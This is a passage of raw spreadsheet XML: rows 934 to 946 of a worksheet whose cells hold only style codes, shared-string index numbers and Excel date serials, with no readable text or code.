      <c r="AO934" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP934" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ934" s="24">
        <v>46072.5047106482</v>
      </c>
      <c r="AR934" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS934" s="23"/>
      <c r="AT934" s="23"/>
      <c r="AU934" s="23"/>
    </row>
    <row r="935" s="1" customFormat="1" spans="1:47">
      <c r="A935" s="23" t="s">
        <v>8588</v>
      </c>
      <c r="B935" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C935" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="D935" s="23" t="s">
        <v>8427</v>
      </c>
      <c r="E935" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F935" s="23" t="s">
        <v>10153</v>
      </c>
      <c r="G935" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H935" s="23"/>
      <c r="I935" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J935" s="23" t="s">
        <v>8590</v>
      </c>
      <c r="K935" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L935" s="24">
        <v>46048.60875</v>
      </c>
      <c r="M935" s="24">
        <v>46073.4269212963</v>
      </c>
      <c r="N935" s="23"/>
      <c r="O935" s="23"/>
      <c r="P935" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q935" s="23"/>
      <c r="R935" s="23" t="s">
        <v>3341</v>
      </c>
      <c r="S935" s="23" t="s">
        <v>8433</v>
      </c>
      <c r="T935" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U935" s="23" t="s">
        <v>8591</v>
      </c>
      <c r="V935" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W935" s="23" t="s">
        <v>123</v>
      </c>
      <c r="X935" s="23" t="s">
        <v>8436</v>
      </c>
      <c r="Y935" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z935" s="24">
        <v>46073.4272222222</v>
      </c>
      <c r="AA935" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB935" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC935" s="23"/>
      <c r="AD935" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE935" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF935" s="23"/>
      <c r="AG935" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH935" s="24">
        <v>46073.4272337963</v>
      </c>
      <c r="AI935" s="23"/>
      <c r="AJ935" s="23"/>
      <c r="AK935" s="23" t="s">
        <v>10154</v>
      </c>
      <c r="AL935" s="23" t="s">
        <v>4354</v>
      </c>
      <c r="AM935" s="23" t="s">
        <v>8495</v>
      </c>
      <c r="AN935" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO935" s="23"/>
      <c r="AP935" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ935" s="24">
        <v>46073.4480555556</v>
      </c>
      <c r="AR935" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS935" s="23"/>
      <c r="AT935" s="23"/>
      <c r="AU935" s="23"/>
    </row>
    <row r="936" s="1" customFormat="1" spans="1:47">
      <c r="A936" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B936" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C936" s="23" t="s">
        <v>10155</v>
      </c>
      <c r="D936" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E936" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F936" s="23" t="s">
        <v>10156</v>
      </c>
      <c r="G936" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H936" s="23"/>
      <c r="I936" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J936" s="23" t="s">
        <v>9056</v>
      </c>
      <c r="K936" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L936" s="24">
        <v>46073.4125231481</v>
      </c>
      <c r="M936" s="24">
        <v>46073.4125231481</v>
      </c>
      <c r="N936" s="23"/>
      <c r="O936" s="23"/>
      <c r="P936" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q936" s="23"/>
      <c r="R936" s="23" t="s">
        <v>10155</v>
      </c>
      <c r="S936" s="23" t="s">
        <v>9057</v>
      </c>
      <c r="T936" s="23"/>
      <c r="U936" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V936" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W936" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X936" s="23" t="s">
        <v>8658</v>
      </c>
      <c r="Y936" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z936" s="24">
        <v>46073.4162615741</v>
      </c>
      <c r="AA936" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB936" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC936" s="23"/>
      <c r="AD936" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE936" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF936" s="23"/>
      <c r="AG936" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH936" s="24">
        <v>46073.4162847222</v>
      </c>
      <c r="AI936" s="23"/>
      <c r="AJ936" s="23"/>
      <c r="AK936" s="23"/>
      <c r="AL936" s="23"/>
      <c r="AM936" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN936" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO936" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP936" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ936" s="24">
        <v>46073.4370949074</v>
      </c>
      <c r="AR936" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS936" s="23"/>
      <c r="AT936" s="23"/>
      <c r="AU936" s="23"/>
    </row>
    <row r="937" s="1" customFormat="1" spans="1:47">
      <c r="A937" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B937" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C937" s="23" t="s">
        <v>3444</v>
      </c>
      <c r="D937" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E937" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F937" s="23" t="s">
        <v>10157</v>
      </c>
      <c r="G937" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H937" s="23"/>
      <c r="I937" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J937" s="23"/>
      <c r="K937" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L937" s="24">
        <v>46073.2029050926</v>
      </c>
      <c r="M937" s="24">
        <v>46073.2029050926</v>
      </c>
      <c r="N937" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O937" s="23"/>
      <c r="P937" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q937" s="23"/>
      <c r="R937" s="23"/>
      <c r="S937" s="23"/>
      <c r="T937" s="23"/>
      <c r="U937" s="23"/>
      <c r="V937" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W937" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X937" s="23" t="s">
        <v>8549</v>
      </c>
      <c r="Y937" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z937" s="24">
        <v>46073.2029050926</v>
      </c>
      <c r="AA937" s="23"/>
      <c r="AB937" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC937" s="23"/>
      <c r="AD937" s="23"/>
      <c r="AE937" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF937" s="23"/>
      <c r="AG937" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH937" s="24"/>
      <c r="AI937" s="23"/>
      <c r="AJ937" s="23"/>
      <c r="AK937" s="23"/>
      <c r="AL937" s="23"/>
      <c r="AM937" s="23"/>
      <c r="AN937" s="23"/>
      <c r="AO937" s="23"/>
      <c r="AP937" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ937" s="24">
        <v>46073.2237384259</v>
      </c>
      <c r="AR937" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS937" s="23"/>
      <c r="AT937" s="23"/>
      <c r="AU937" s="23"/>
    </row>
    <row r="938" s="1" customFormat="1" spans="1:47">
      <c r="A938" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B938" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C938" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D938" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E938" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F938" s="23" t="s">
        <v>10158</v>
      </c>
      <c r="G938" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H938" s="23"/>
      <c r="I938" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J938" s="23"/>
      <c r="K938" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L938" s="24">
        <v>46073.1702662037</v>
      </c>
      <c r="M938" s="24">
        <v>46073.1702662037</v>
      </c>
      <c r="N938" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O938" s="23"/>
      <c r="P938" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q938" s="23"/>
      <c r="R938" s="23"/>
      <c r="S938" s="23"/>
      <c r="T938" s="23"/>
      <c r="U938" s="23"/>
      <c r="V938" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W938" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X938" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y938" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z938" s="24">
        <v>46073.1702662037</v>
      </c>
      <c r="AA938" s="23"/>
      <c r="AB938" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC938" s="23"/>
      <c r="AD938" s="23"/>
      <c r="AE938" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF938" s="23"/>
      <c r="AG938" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH938" s="24"/>
      <c r="AI938" s="23"/>
      <c r="AJ938" s="23"/>
      <c r="AK938" s="23"/>
      <c r="AL938" s="23"/>
      <c r="AM938" s="23"/>
      <c r="AN938" s="23"/>
      <c r="AO938" s="23"/>
      <c r="AP938" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ938" s="24">
        <v>46073.191099537</v>
      </c>
      <c r="AR938" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS938" s="23"/>
      <c r="AT938" s="23"/>
      <c r="AU938" s="23"/>
    </row>
    <row r="939" s="1" customFormat="1" spans="1:47">
      <c r="A939" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B939" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C939" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D939" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E939" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F939" s="23" t="s">
        <v>10159</v>
      </c>
      <c r="G939" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H939" s="23"/>
      <c r="I939" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J939" s="23"/>
      <c r="K939" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L939" s="24">
        <v>46073.1667824074</v>
      </c>
      <c r="M939" s="24">
        <v>46073.1667824074</v>
      </c>
      <c r="N939" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O939" s="23"/>
      <c r="P939" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q939" s="23"/>
      <c r="R939" s="23"/>
      <c r="S939" s="23"/>
      <c r="T939" s="23"/>
      <c r="U939" s="23"/>
      <c r="V939" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W939" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X939" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y939" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z939" s="24">
        <v>46073.1667824074</v>
      </c>
      <c r="AA939" s="23"/>
      <c r="AB939" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC939" s="23"/>
      <c r="AD939" s="23"/>
      <c r="AE939" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF939" s="23"/>
      <c r="AG939" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH939" s="24"/>
      <c r="AI939" s="23"/>
      <c r="AJ939" s="23"/>
      <c r="AK939" s="23"/>
      <c r="AL939" s="23"/>
      <c r="AM939" s="23"/>
      <c r="AN939" s="23"/>
      <c r="AO939" s="23"/>
      <c r="AP939" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ939" s="24">
        <v>46073.1876157407</v>
      </c>
      <c r="AR939" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS939" s="23"/>
      <c r="AT939" s="23"/>
      <c r="AU939" s="23"/>
    </row>
    <row r="940" s="1" customFormat="1" spans="1:47">
      <c r="A940" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B940" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C940" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D940" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E940" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F940" s="23" t="s">
        <v>10160</v>
      </c>
      <c r="G940" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H940" s="23"/>
      <c r="I940" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J940" s="23"/>
      <c r="K940" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L940" s="24">
        <v>46073.162650463</v>
      </c>
      <c r="M940" s="24">
        <v>46073.162650463</v>
      </c>
      <c r="N940" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O940" s="23"/>
      <c r="P940" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q940" s="23"/>
      <c r="R940" s="23"/>
      <c r="S940" s="23"/>
      <c r="T940" s="23"/>
      <c r="U940" s="23"/>
      <c r="V940" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W940" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X940" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y940" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z940" s="24">
        <v>46073.162650463</v>
      </c>
      <c r="AA940" s="23"/>
      <c r="AB940" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC940" s="23"/>
      <c r="AD940" s="23"/>
      <c r="AE940" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF940" s="23"/>
      <c r="AG940" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH940" s="24"/>
      <c r="AI940" s="23"/>
      <c r="AJ940" s="23"/>
      <c r="AK940" s="23"/>
      <c r="AL940" s="23"/>
      <c r="AM940" s="23"/>
      <c r="AN940" s="23"/>
      <c r="AO940" s="23"/>
      <c r="AP940" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ940" s="24">
        <v>46073.1834837963</v>
      </c>
      <c r="AR940" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS940" s="23"/>
      <c r="AT940" s="23"/>
      <c r="AU940" s="23"/>
    </row>
    <row r="941" s="1" customFormat="1" spans="1:47">
      <c r="A941" s="23" t="s">
        <v>8966</v>
      </c>
      <c r="B941" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C941" s="23" t="s">
        <v>9239</v>
      </c>
      <c r="D941" s="23" t="s">
        <v>8967</v>
      </c>
      <c r="E941" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F941" s="23" t="s">
        <v>10161</v>
      </c>
      <c r="G941" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H941" s="23"/>
      <c r="I941" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J941" s="23" t="s">
        <v>9239</v>
      </c>
      <c r="K941" s="23" t="s">
        <v>8598</v>
      </c>
      <c r="L941" s="24">
        <v>46073.1599884259</v>
      </c>
      <c r="M941" s="24">
        <v>46073.1599884259</v>
      </c>
      <c r="N941" s="23"/>
      <c r="O941" s="23"/>
      <c r="P941" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q941" s="23"/>
      <c r="R941" s="23" t="s">
        <v>9239</v>
      </c>
      <c r="S941" s="23" t="s">
        <v>10162</v>
      </c>
      <c r="T941" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U941" s="23" t="s">
        <v>8970</v>
      </c>
      <c r="V941" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W941" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X941" s="23" t="s">
        <v>8557</v>
      </c>
      <c r="Y941" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z941" s="24">
        <v>46073.1606134259</v>
      </c>
      <c r="AA941" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB941" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC941" s="23"/>
      <c r="AD941" s="23" t="s">
        <v>8462</v>
      </c>
      <c r="AE941" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF941" s="23"/>
      <c r="AG941" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH941" s="24">
        <v>46073.160625</v>
      </c>
      <c r="AI941" s="23"/>
      <c r="AJ941" s="23"/>
      <c r="AK941" s="23" t="s">
        <v>9241</v>
      </c>
      <c r="AL941" s="23" t="s">
        <v>8972</v>
      </c>
      <c r="AM941" s="23" t="s">
        <v>8441</v>
      </c>
      <c r="AN941" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO941" s="23"/>
      <c r="AP941" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ941" s="24">
        <v>46073.1814467593</v>
      </c>
      <c r="AR941" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS941" s="23"/>
      <c r="AT941" s="23"/>
      <c r="AU941" s="23"/>
    </row>
    <row r="942" s="1" customFormat="1" spans="1:47">
      <c r="A942" s="23" t="s">
        <v>8966</v>
      </c>
      <c r="B942" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C942" s="23" t="s">
        <v>808</v>
      </c>
      <c r="D942" s="23" t="s">
        <v>8967</v>
      </c>
      <c r="E942" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F942" s="23" t="s">
        <v>10163</v>
      </c>
      <c r="G942" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H942" s="23"/>
      <c r="I942" s="23" t="s">
        <v>8429</v>
      </c>
      <c r="J942" s="23" t="s">
        <v>808</v>
      </c>
      <c r="K942" s="23" t="s">
        <v>8598</v>
      </c>
      <c r="L942" s="24">
        <v>46073.1599884259</v>
      </c>
      <c r="M942" s="24">
        <v>46073.1599884259</v>
      </c>
      <c r="N942" s="23"/>
      <c r="O942" s="23"/>
      <c r="P942" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q942" s="23"/>
      <c r="R942" s="23" t="s">
        <v>808</v>
      </c>
      <c r="S942" s="23" t="s">
        <v>10162</v>
      </c>
      <c r="T942" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U942" s="23" t="s">
        <v>8970</v>
      </c>
      <c r="V942" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W942" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X942" s="23" t="s">
        <v>8680</v>
      </c>
      <c r="Y942" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z942" s="24">
        <v>46073.160625</v>
      </c>
      <c r="AA942" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB942" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC942" s="23"/>
      <c r="AD942" s="23" t="s">
        <v>8462</v>
      </c>
      <c r="AE942" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF942" s="23"/>
      <c r="AG942" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH942" s="24">
        <v>46073.1606365741</v>
      </c>
      <c r="AI942" s="23"/>
      <c r="AJ942" s="23"/>
      <c r="AK942" s="23" t="s">
        <v>10164</v>
      </c>
      <c r="AL942" s="23" t="s">
        <v>8972</v>
      </c>
      <c r="AM942" s="23" t="s">
        <v>8441</v>
      </c>
      <c r="AN942" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO942" s="23"/>
      <c r="AP942" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ942" s="24">
        <v>46073.1814583333</v>
      </c>
      <c r="AR942" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS942" s="23"/>
      <c r="AT942" s="23"/>
      <c r="AU942" s="23"/>
    </row>
    <row r="943" s="1" customFormat="1" spans="1:47">
      <c r="A943" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B943" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C943" s="23" t="s">
        <v>1977</v>
      </c>
      <c r="D943" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E943" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F943" s="23" t="s">
        <v>10165</v>
      </c>
      <c r="G943" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H943" s="23"/>
      <c r="I943" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J943" s="23"/>
      <c r="K943" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L943" s="24">
        <v>46073.1293518519</v>
      </c>
      <c r="M943" s="24">
        <v>46073.1293518519</v>
      </c>
      <c r="N943" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O943" s="23"/>
      <c r="P943" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q943" s="23"/>
      <c r="R943" s="23"/>
      <c r="S943" s="23"/>
      <c r="T943" s="23"/>
      <c r="U943" s="23"/>
      <c r="V943" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W943" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X943" s="23" t="s">
        <v>8557</v>
      </c>
      <c r="Y943" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z943" s="24">
        <v>46073.1293518519</v>
      </c>
      <c r="AA943" s="23"/>
      <c r="AB943" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC943" s="23"/>
      <c r="AD943" s="23"/>
      <c r="AE943" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF943" s="23"/>
      <c r="AG943" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH943" s="24"/>
      <c r="AI943" s="23"/>
      <c r="AJ943" s="23"/>
      <c r="AK943" s="23"/>
      <c r="AL943" s="23"/>
      <c r="AM943" s="23"/>
      <c r="AN943" s="23"/>
      <c r="AO943" s="23"/>
      <c r="AP943" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ943" s="24">
        <v>46073.1501851852</v>
      </c>
      <c r="AR943" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS943" s="23"/>
      <c r="AT943" s="23"/>
      <c r="AU943" s="23"/>
    </row>
    <row r="944" s="1" customFormat="1" spans="1:47">
      <c r="A944" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B944" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C944" s="23" t="s">
        <v>800</v>
      </c>
      <c r="D944" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E944" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F944" s="23" t="s">
        <v>10166</v>
      </c>
      <c r="G944" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H944" s="23"/>
      <c r="I944" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J944" s="23" t="s">
        <v>8673</v>
      </c>
      <c r="K944" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L944" s="24">
        <v>46073.0419328704</v>
      </c>
      <c r="M944" s="24">
        <v>46073.0419328704</v>
      </c>
      <c r="N944" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O944" s="23"/>
      <c r="P944" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q944" s="23"/>
      <c r="R944" s="23" t="s">
        <v>800</v>
      </c>
      <c r="S944" s="23" t="s">
        <v>8674</v>
      </c>
      <c r="T944" s="23"/>
      <c r="U944" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V944" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W944" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X944" s="23" t="s">
        <v>8675</v>
      </c>
      <c r="Y944" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z944" s="24">
        <v>46073.0428125</v>
      </c>
      <c r="AA944" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB944" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC944" s="23"/>
      <c r="AD944" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE944" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF944" s="23"/>
      <c r="AG944" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH944" s="24">
        <v>46073.0428356481</v>
      </c>
      <c r="AI944" s="23"/>
      <c r="AJ944" s="23"/>
      <c r="AK944" s="23"/>
      <c r="AL944" s="23"/>
      <c r="AM944" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN944" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO944" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP944" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ944" s="24">
        <v>46073.0636458333</v>
      </c>
      <c r="AR944" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS944" s="23"/>
      <c r="AT944" s="23"/>
      <c r="AU944" s="23"/>
    </row>
    <row r="945" s="1" customFormat="1" spans="1:47">
      <c r="A945" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B945" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C945" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D945" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E945" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F945" s="23" t="s">
        <v>10167</v>
      </c>
      <c r="G945" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H945" s="23"/>
      <c r="I945" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J945" s="23" t="s">
        <v>8383</v>
      </c>
      <c r="K945" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L945" s="24">
        <v>46072.9022685185</v>
      </c>
      <c r="M945" s="24">
        <v>46072.9041319444</v>
      </c>
      <c r="N945" s="23" t="s">
        <v>8927</v>
      </c>
      <c r="O945" s="23"/>
      <c r="P945" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q945" s="23"/>
      <c r="R945" s="23" t="s">
        <v>10168</v>
      </c>
      <c r="S945" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T945" s="23"/>
      <c r="U945" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V945" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W945" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X945" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y945" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z945" s="24">
        <v>46072.9025694444</v>
      </c>
      <c r="AA945" s="23"/>
      <c r="AB945" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC945" s="23"/>
      <c r="AD945" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE945" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF945" s="23"/>
      <c r="AG945" s="25" t="s">
        <v>8439</v>
      </c>
      <c r="AH945" s="24">
        <v>46072.9026273148</v>
      </c>
      <c r="AI945" s="23"/>
      <c r="AJ945" s="23"/>
      <c r="AK945" s="23"/>
      <c r="AL945" s="23"/>
      <c r="AM945" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN945" s="23"/>
      <c r="AO945" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP945" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ945" s="24">
        <v>46072.9234027778</v>
      </c>
      <c r="AR945" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS945" s="23"/>
      <c r="AT945" s="23"/>
      <c r="AU945" s="23"/>
    </row>
    <row r="946" s="1" customFormat="1" spans="1:47">
      <c r="A946" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B946" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C946" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D946" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E946" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F946" s="23" t="s">
        <v>10169</v>
      </c>
      <c r="G946" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H946" s="23"/>
      <c r="I946" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J946" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K946" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L946" s="24">
        <v>46072.7949189815</v>
      </c>
      <c r="M946" s="24">
        <v>46072.7983912037</v>
      </c>
      <c r="N946" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O946" s="23"/>
      <c r="P946" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q946" s="23"/>
      <c r="R946" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S946" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T946" s="23"/>
      <c r="U946" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V946" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W946" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X946" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y946" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z946" s="24">
        <v>46072.7952199074</v>
      </c>
      <c r="AA946" s="23"/>
      <c r="AB946" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC946" s="23"/>
      <c r="AD946" s="23" t="s">
        <v>8392</v>
      </c>
